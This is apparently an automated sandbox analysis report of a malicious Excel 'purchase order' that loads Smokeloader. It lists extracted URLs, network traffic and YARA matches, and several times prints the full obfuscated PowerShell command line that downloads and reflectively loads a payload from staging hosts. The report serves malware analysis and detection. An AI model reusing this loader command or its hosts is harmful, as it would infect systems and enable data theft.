          Source: explorer.exe, 0000001F.00000000.522442081.00000000072E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.521769301.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.522082384.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000001F.00000000.522442081.00000000072E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.521769301.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.522082384.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000001F.00000000.521769301.000000000260E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerxe
          Source: powershell.exe, 00000010.00000002.511129884.00000000025C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.560114781.0000000002672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
          Source: powershell.exe, 0000001C.00000002.560114781.0000000002672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: powershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: mshta.exe, 00000005.00000002.426631892.0000000003230000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487347079.0000000003C56000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487807567.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.482683098.0000000003C56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/
          Source: mshta.exe, 00000005.00000003.421467560.00000000003A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423322872.0000000000370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.000000000034A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.421467560.0000000000371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423322872.00000000003A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.00000000003A0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426031812.0000000000371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487524489.000000000014D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487590703.0000000000192000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486994334.0000000000192000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.00000000001B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487556654.000000000012A000.00000004.00000020.00020000.00000000.sdmp, #U3010TW-S PO#U3011PO#3311-20241118003.xls, D6330000.0.drString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen
          Source: mshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helen93
          Source: mshta.exe, 00000011.00000003.476368039.00000000001B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenJ
          Source: mshta.exe, 00000011.00000003.476368039.000000000015F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenM?
          Source: mshta.exe, 00000011.00000002.487556654.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenUw~N
          Source: mshta.exe, 00000011.00000003.487524489.000000000014D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenVw~M
          Source: mshta.exe, 00000011.00000003.486994334.000000000014C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.476368039.000000000014D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenXw~C
          Source: mshta.exe, 00000011.00000003.487328121.0000000003BBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487807567.0000000003BBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenesp
          Source: mshta.exe, 00000011.00000002.487556654.000000000012A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/bUPKfu?&sari=acoustic&flat=red&crown=important&nurture=aboriginal&helenyX
          Source: mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/vW~(
          Source: mshta.exe, 00000005.00000003.423125156.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.424134255.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.000000000329C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.000000000329C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://link.uebie.de/~W~(
          Source: powershell.exe, 00000006.00000002.453312735.00000000120B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: explorer.exe, 00000026.00000003.591178920.0000000000658000.00000004.00000020.00020000.00000000.sdmp, 402E.tmp.38.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: mshta.exe, 00000005.00000003.424134255.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.422979100.0000000003252000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.426654460.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.423125156.0000000003253000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.486943045.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487409113.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.487328121.0000000003BDA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.483846051.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.487839067.0000000003BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: 402E.tmp.38.drString found in binary or memory: https://www.google.com/favicon.ico
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000001F.00000000.521354537.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49161 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49168 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: 30.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
          Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

          System Summary

          barindex
          Source: 00000022.00000002.567719148.0000000000261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: 0000001E.00000002.522844560.00000000001F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
          Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsOLE: Microsoft Excel 2007+
          Source: ~DF7DC820911769618A.TMP.0.drOLE: Microsoft Excel 2007+
          Source: D6330000.0.drOLE: Microsoft Excel 2007+
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat[1].htaJump to behavior
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2